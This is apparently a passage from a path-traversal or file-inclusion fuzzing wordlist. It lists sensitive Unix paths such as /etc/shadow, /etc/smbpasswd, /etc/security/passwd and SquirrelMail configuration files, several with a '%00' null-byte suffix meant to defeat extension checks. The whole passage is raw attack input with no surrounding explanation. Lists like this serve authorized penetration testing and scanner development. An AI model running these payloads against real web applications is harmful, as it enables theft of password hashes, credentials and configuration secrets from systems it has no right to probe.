/etc/security/passwd%00
/etc/security/sepermit.conf
/etc/security/time.conf
/etc/security/user
/etc/security/user%00
/etc/sensors.conf
/etc/sensors3.conf
/etc/shadow
/etc/shadow%00
/etc/shadow-
/etc/shadow~
/etc/slackware-release
/etc/smb.conf
/etc/smbpasswd
/etc/smi.conf
/etc/snmpd.conf
/etc/squirrelmail/apache.conf
/etc/squirrelmail/config.php
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config_default.php
/etc/squirrelmail/config_local.php
/etc/squirrelmail/default_pref
/etc/squirrelmail/filters_setup.php
/etc/squirrelmail/index.php
/etc/squirrelmail/sqspell_config.php
